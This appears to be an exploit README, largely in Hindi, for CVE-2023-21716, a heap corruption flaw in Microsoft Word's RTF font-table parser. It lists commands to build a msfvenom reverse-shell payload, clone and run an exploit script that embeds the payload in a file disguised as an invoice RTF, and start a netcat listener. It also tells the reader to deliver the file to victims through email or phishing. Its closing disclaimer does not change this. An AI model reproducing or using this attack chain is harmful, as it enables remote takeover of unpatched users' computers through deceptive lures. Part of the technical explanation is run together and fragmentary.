
CVE-2023-21716 - Microsoft Word RTF fonttbl Heap Corruption RCE exploit with reverse shell payload
गंभीरता: क्रिटिकल (CVSS 9.8)
प्रभावित: Microsoft Word 2013 / 2016 / 2019 / 2021 (अनपैच्ड)
पैच: Microsoft फरवरी 2023 पैच ट्यूज़डे
लेखक: REGGYRAIDER
CVE-2023-21716 माइक्रोसॉफ्ट वर्ड के RTF पार्सर (wwlib.dll) में एक हीप करप्शन भेद्यता है।
जब वर्ड एक \fonttbl निर्देश को पार्स करता है जिसमें 32,767 से अधिक फ़ॉन्ट प्रविष्टियाँ होती हैं, तो एक आंतरिक साइन्ड 16-बिट काउंटर ओवरफ़्लो हो जाता है, जिससे हीप मेटाडेटा दूषित हो जाता है। यह एक हमलावर को केवल पीड़ित को एक क्राफ्टेड .rtf फ़ाइल भेजकर रिमोट कोड निष्पादन प्राप्त करने की अनुमति देता है।
कोई मैक्रो नहीं। फ़ाइल खोलने के अलावा कोई उपयोगकर्ता इंटरैक्शन नहीं।
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<YOUR_IP> LPORT=4444 -f raw -o payload.bin
git clone https://github.com/REGGYRAIDER/CVE-2023-21716
cd CVE-2023-21716
python3 exploit.py payload.bin invoice_march2024.rtf
nc -lvnp 4444
SMB, ईमेल अटैचमेंट, या किसी भी फ़िशिंग वेक्टर के माध्यम से अपलोड करें।
जब पीड़ित एक अनपैच्ड वर्ड में invoice_march2024.rtf खोलता है, तो आपको एक रिवर्स शेल प्राप्त होता है।
Attacker creates RTF Word parses \fonttbl Heap corrupted
───────────────────── ──► ────────────────────── ──► ──────────────
\fonttbl with 32769+ Signed 16-bit counter Attacker's
font definitions overflows → 0x8000 shellcode runs
\fonttbl के अंदर 32,769 \f<N> फ़ॉन्ट परिभाषाएँ एम्बेड करता है।payload.bin से) \pict के अंदर रखा जाता है और दूषित क्षेत्र में उतरता है, जब आवंटक इसे संसाधित करता है तो निष्पादन प्राप्त करता है।यह उपकरण केवल शैक्षिक उद्देश्यों और अधिकृत पैठ परीक्षण के लिए अभिप्रेत है।
इस एक्सप्लॉइट का उपयोग उन प्रणालियों के विरुद्ध करना जिनके आप मालिक नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति नहीं है, अवैध है।
लेखक दुरुपयोग के लिए कोई जिम्मेदारी नहीं लेता है।